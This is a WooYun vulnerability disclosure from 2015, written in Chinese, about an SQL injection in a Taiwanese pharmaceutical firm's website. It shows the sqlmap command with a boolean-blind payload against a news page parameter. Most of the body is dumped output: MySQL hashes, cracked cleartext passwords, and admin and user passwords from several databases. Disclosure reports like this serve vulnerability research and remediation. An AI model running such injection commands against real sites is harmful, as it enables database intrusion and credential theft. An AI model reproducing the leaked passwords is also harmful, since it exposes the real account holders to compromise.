五洲製藥主站存在SQL注射漏洞（DBA权限/root密码/系统管理员密码/用户密码）（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157367

漏洞标题：五洲製藥主站存在SQL注射漏洞（DBA权限/root密码/系统管理员密码/用户密码）（臺灣地區）

漏洞作者：路人甲

提交时间：2015-12-03 11:26

修复时间：2016-01-21 01:10

公开时间：2016-01-21 01:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-03：细节已通知厂商并且等待厂商处理中
2015-12-07：厂商已经确认，细节仅向厂商公开
2015-12-17：细节向核心白帽子及相关领域专家公开
2015-12-27：细节向普通白帽子公开
2016-01-06：细节向实习白帽子公开
2016-01-21：细节向公众公开

简要描述：

五洲製藥本諸「良心做事，道德製藥」之理念。先研究不傷身體：藥品的安全性優先；再講究效果：才講求藥品的藥效。

详细说明：

地址：http://**.**.**.**/news_detail.php?id=14

$ python sqlmap.py -u "http://**.**.**.**/news_detail.php?id=14" -p id --technique=B --random-agent --batch  --no-cast --current-user --is-dba --users--passwords --count --search -C pass --output-dir=output

current user:    'root@localhost'
current user is DBA:    True
database management system users [4]:
[*] 'dmu'@'localhost'
[*] 'fenfan'@'localhost'
[*] 'project'@'localhost'
[*] 'root'@'localhost'
database management system users password hashes:
[*] dmu [1]:
    password hash: *D3C4FBED5A158CF38DFB3C9A2F3BDB6ADE3ECE39
[*] fenfan [1]:
    password hash: *1DD724553F42BA047FD7DAED76E5C702911D9496
    clear-text password: fenfan
[*] project [1]:
    password hash: *FD0B2F9649853705D5A8A1D84AEA4B57B9590B23
    clear-text password: project
[*] root [1]:
    password hash: *2C6240B651D9BCA24950C80314780A7F340668DF

Database: ntuhrstw_davinci
Table: administrator
[1 entry]
+---------------------------------------------------+
| password                                          |
+---------------------------------------------------+
| *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |
+---------------------------------------------------+
Database: ntuhrstw_davinci_en
Table: administrator
[1 entry]
+-------------------------------------------+
| password                                  |
+-------------------------------------------+
| *D3B38D0BF9A6462C956D0329383606875826ED01 |
+-------------------------------------------+
Database: moyage_beacon
Table: admin
[3 entries]
+-------------+
| password    |
+-------------+
| admin       |
| afra8158    |
| curtiskuang |
+-------------+
Database: moyage_beacon
Table: users
[50 entries]
+------------+
| password   |
+------------+
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
| 11         |
| 2xiiuili   |
| 2xiiuili   |
| afra2012   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| curtis0803 |
| dernt6889  |
| test12345  |
| test12345  |
| test12345  |
| tucott98   |
+------------+
Database: moyage_beacon
Table: providers
[31 entries]
+-----------+
| password  |
+-----------+
| 0001      |
| 0001      |
| 0001      |
| 0001      |
| 0160c99   |
| 1111      |
| 1qaz2wsx  |
| 2xiiuili  |
| 4b5aae8   |
| 62e1a9d   |
| aabbcc    |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| e9972a8   |
| fffff     |
| is888ing  |
| iyaya6    |
| ladygaga1 |
| nmhgov    |
| saart     |
| steam888  |
| test123   |
| try123    |
| ＦＦＦＦＦ     |
+-----------+
Database: davinci
Table: admin
[1 entry]
+----------+
| password |
+----------+
| davinci  |
+----------+
Database: unisonsr_davinci
Table: admin
[1 entry]
+---------------+
| password      |
+---------------+
| dvsrg24471655 |
+---------------+
Database: tentandesign_flash
Table: admin
[1 entry]
+--------------+
| password     |
+--------------+
| tentandesign |
+--------------+
Database: tentandesign_flash
Table: news
[8 entries]
+----------+
| password |
+----------+
|          |
|          |
|          |
|          |
|          |
|          |
|          |
|          |
+----------+
Database: mysql
Table: user
[4 entries]
+-----------------------------------------------------+
| Password                                            |
+-----------------------------------------------------+
| *1DD724553F42BA047FD7DAED76E5C702911D9496 (fenfan)  |
| *2C6240B651D9BCA24950C80314780A7F340668DF           |
| *D3C4FBED5A158CF38DFB3C9A2F3BDB6ADE3ECE39           |
| *FD0B2F9649853705D5A8A1D84AEA4B57B9590B23 (project) |
+-----------------------------------------------------+
Database: mysql
Table: servers
[0 entries]
+----------+
| Password |
+----------+
+----------+
Database: ntuh_davinci
Table: administrator
[2 entries]
+---------------------------------------------------+
| password                                          |
+---------------------------------------------------+
| *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |
| *D3B38D0BF9A6462C956D0329383606875826ED01         |
+---------------------------------------------------+

漏洞证明：

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=14 AND 2442=2442
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.31
back-end DBMS: MySQL >= 5.0.0
current user:    'root@localhost'
current user is DBA:    True
database management system users [4]:
[*] 'dmu'@'localhost'
[*] 'fenfan'@'localhost'
[*] 'project'@'localhost'
[*] 'root'@'localhost'
database management system users password hashes:
[*] dmu [1]:
    password hash: *D3C4FBED5A158CF38DFB3C9A2F3BDB6ADE3ECE39
[*] fenfan [1]:
    password hash: *1DD724553F42BA047FD7DAED76E5C702911D9496
    clear-text password: fenfan
[*] project [1]:
    password hash: *FD0B2F9649853705D5A8A1D84AEA4B57B9590B23
    clear-text password: project
[*] root [1]:
    password hash: *2C6240B651D9BCA24950C80314780A7F340668DF
Database: ntuhrstw_davinci
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| data_storage                          | 228     |
| doctors                               | 29      |
| surgery                               | 28      |
| news                                  | 15      |
| qa                                    | 12      |
| teach_research                        | 11      |
| team_categories                       | 8       |
| leave_message                         | 2       |
| wardmate                              | 2       |
| administrator                         | 1       |
| nurses                                | 1       |
+---------------------------------------+---------+
Database: performance_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| setup_consumers                       | 8       |
| performance_timers                    | 5       |
| setup_timers                          | 1       |
+---------------------------------------+---------+
Database: davinci
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| data_storage                          | 301     |
| categories                            | 169     |
| admin                                 | 1       |
+---------------------------------------+---------+
Database: moyage_beacon
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| user_attend_time                      | 5384    |
| provider_push_info                    | 1840    |
| user_item_halt_time                   | 1010    |
| user_device_logs                      | 120     |
| data_storage                          | 104     |
| provider_push                         | 87      |
| confirm_code_logs                     | 71      |
| promotion_info                        | 53      |
| activity_quiz_result                  | 52      |
| users                                 | 50      |
| customer_survey                       | 40      |
| coupon_user                           | 39      |
| coupon                                | 37      |
| items                                 | 37      |
| user_share_logs                       | 37      |
| activity_quiz                         | 36      |
| providers                             | 31      |
| activities                            | 30      |
| beacon                                | 26      |
| provider_beacon                       | 26      |
| provider_units                        | 23      |
| provider_contract                     | 21      |
| promotion_info_user                   | 14      |
| brand                                 | 8       |
| service_categories                    | 5       |
| admin                                 | 3       |
+---------------------------------------+---------+
Database: ntuhrstw_davinci_en
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| data_storage                          | 229     |
| doctors                               | 29      |
| surgery                               | 28      |
| news                                  | 15      |
| qa                                    | 12      |
| teach_research                        | 11      |
| team_categories                       | 8       |
| leave_message                         | 2       |
| wardmate                              | 2       |
| administrator                         | 1       |
| nurses                                | 1       |
+---------------------------------------+---------+
Database: unisonsr_davinci
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| data_storage                          | 330     |
| categories                            | 186     |
| admin                                 | 1       |
+---------------------------------------+---------+
Database: tentandesign_html
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| project_pic                           | 744     |
| project                               | 97      |
| news                                  | 5       |
| member                                | 4       |
| a                                     | 3       |
| admin                                 | 1       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 1047    |
| help_topic                            | 511     |
| help_keyword                          | 467     |
| help_category                         | 40      |
| `user`                                | 4       |
| proc                                  | 3       |
| db                                    | 2       |
| func                                  | 2       |
| proxies_priv                          | 1       |
+---------------------------------------+---------+
Database: ntuh_davinci
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| data_storage                          | 155     |
| surgery                               | 28      |
| doctors                               | 27      |
| news                                  | 12      |
| qa                                    | 12      |
| teach_research                        | 11      |
| team_categories                       | 8       |
| administrator                         | 2       |
| event                                 | 2       |
| wardmate                              | 2       |
| leave_message                         | 1       |
| nurses                                | 1       |
+---------------------------------------+---------+
Database: ucpharm
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| resume                                | 3212    |
| product                               | 80      |
| product_categories                    | 25      |
| data_storage                          | 20      |
| cf                                    | 17      |
| news                                  | 15      |
| responsibility_art_promotion          | 7       |
| careers_info                          | 4       |
| contact                               | 2       |
| administrator                         | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| INNODB_BUFFER_PAGE                    | 18752   |
| COLUMNS                               | 1924    |
| INNODB_BUFFER_PAGE_LRU                | 1427    |
| SESSION_VARIABLES                     | 331     |
| GLOBAL_VARIABLES                      | 319     |
| GLOBAL_STATUS                         | 312     |
| SESSION_STATUS                        | 312     |
| STATISTICS                            | 243     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| PARTITIONS                            | 171     |
| TABLES                                | 171     |
| KEY_COLUMN_USAGE                      | 133     |
| TABLE_CONSTRAINTS                     | 109     |
| USER_PRIVILEGES                       | 58      |
| CHARACTER_SETS                        | 39      |
| PLUGINS                               | 23      |
| SCHEMA_PRIVILEGES                     | 22      |
| SCHEMATA                              | 14      |
| ENGINES                               | 9       |
| PARAMETERS                            | 6       |
| INNODB_CMP                            | 5       |
| INNODB_CMP_RESET                      | 5       |
| INNODB_CMPMEM                         | 5       |
| INNODB_CMPMEM_RESET                   | 5       |
| ROUTINES                              | 3       |
| INNODB_BUFFER_POOL_STATS              | 1       |
| PROCESSLIST                           | 1       |
+---------------------------------------+---------+
Database: tentandesign_flash
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| project_pic                           | 503     |
| project                               | 70      |
| news                                  | 8       |
| member                                | 4       |
| admin                                 | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: ntuhrstw_davinci
Table: administrator
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: davinci
Table: admin
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: ntuh_davinci
Table: administrator
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: ntuhrstw_davinci_en
Table: administrator
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: unisonsr_davinci
Table: admin
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: tentandesign_flash
Table: admin
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: tentandesign_flash
Table: news
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: mysql
Table: user
[1 column]
+----------+
| Column   |
+----------+
| Password |
+----------+
Database: mysql
Table: servers
[1 column]
+----------+
| Column   |
+----------+
| Password |
+----------+
Database: moyage_beacon
Table: admin
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: moyage_beacon
Table: users
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: moyage_beacon
Table: providers
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: tentandesign_html
Table: admin
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: tentandesign_html
Table: news
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: ucpharm
Table: administrator
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: ntuhrstw_davinci
Table: administrator
[1 entry]
+---------------------------------------------------+
| password                                          |
+---------------------------------------------------+
| *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |
+---------------------------------------------------+
Database: ntuhrstw_davinci_en
Table: administrator
[1 entry]
+-------------------------------------------+
| password                                  |
+-------------------------------------------+
| *D3B38D0BF9A6462C956D0329383606875826ED01 |
+-------------------------------------------+
Database: moyage_beacon
Table: admin
[3 entries]
+-------------+
| password    |
+-------------+
| admin       |
| afra8158    |
| curtiskuang |
+-------------+
Database: moyage_beacon
Table: users
[50 entries]
+------------+
| password   |
+------------+
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
|            |
| 11         |
| 2xiiuili   |
| 2xiiuili   |
| afra2012   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| afra8158   |
| curtis0803 |
| dernt6889  |
| test12345  |
| test12345  |
| test12345  |
| tucott98   |
+------------+
Database: moyage_beacon
Table: providers
[31 entries]
+-----------+
| password  |
+-----------+
| 0001      |
| 0001      |
| 0001      |
| 0001      |
| 0160c99   |
| 1111      |
| 1qaz2wsx  |
| 2xiiuili  |
| 4b5aae8   |
| 62e1a9d   |
| aabbcc    |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| afra8158  |
| e9972a8   |
| fffff     |
| is888ing  |
| iyaya6    |
| ladygaga1 |
| nmhgov    |
| saart     |
| steam888  |
| test123   |
| try123    |
| ＦＦＦＦＦ     |
+-----------+
Database: davinci
Table: admin
[1 entry]
+----------+
| password |
+----------+
| davinci  |
+----------+
Database: unisonsr_davinci
Table: admin
[1 entry]
+---------------+
| password      |
+---------------+
| dvsrg24471655 |
+---------------+
Database: tentandesign_flash
Table: admin
[1 entry]
+--------------+
| password     |
+--------------+
| tentandesign |
+--------------+
Database: tentandesign_flash
Table: news
[8 entries]
+----------+
| password |
+----------+
|          |
|          |
|          |
|          |
|          |
|          |
|          |
|          |
+----------+
Database: mysql
Table: user
[4 entries]
+-----------------------------------------------------+
| Password                                            |
+-----------------------------------------------------+
| *1DD724553F42BA047FD7DAED76E5C702911D9496 (fenfan)  |
| *2C6240B651D9BCA24950C80314780A7F340668DF           |
| *D3C4FBED5A158CF38DFB3C9A2F3BDB6ADE3ECE39           |
| *FD0B2F9649853705D5A8A1D84AEA4B57B9590B23 (project) |
+-----------------------------------------------------+
Database: mysql
Table: servers
[0 entries]
+----------+
| Password |
+----------+
+----------+
Database: ntuh_davinci
Table: administrator
[2 entries]
+---------------------------------------------------+
| password                                          |
+---------------------------------------------------+
| *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |
| *D3B38D0BF9A6462C956D0329383606875826ED01         |
+---------------------------------------------------+
Database: ucpharm
Table: administrator
[1 entry]
+----------+
| password |
+----------+
| ucpharm  |
+----------+
Database: tentandesign_html
Table: admin
[1 entry]
+--------------+
| password     |
+--------------+
| tentandesign |
+--------------+
Database: tentandesign_html
Table: news
[5 entries]
+----------+
| password |
+----------+
|          |
|          |
|          |
| 1234     |
| 12345    |
+----------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2015-12-07 01:02

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157367

漏洞标题：五洲製藥主站存在SQL注射漏洞（DBA权限/root密码/系统管理员密码/用户密码）（臺灣地區）

相关厂商：五洲製藥

漏洞作者：路人甲

提交时间：2015-12-03 11:26

修复时间：2016-01-21 01:10

公开时间：2016-01-21 01:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157367

漏洞标题：五洲製藥主站存在SQL注射漏洞（DBA权限/root密码/系统管理员密码/用户密码）（臺灣地區）

相关厂商：五洲製藥

漏洞作者： 路人甲

提交时间：2015-12-03 11:26

修复时间：2016-01-21 01:10

公开时间：2016-01-21 01:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0157367"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云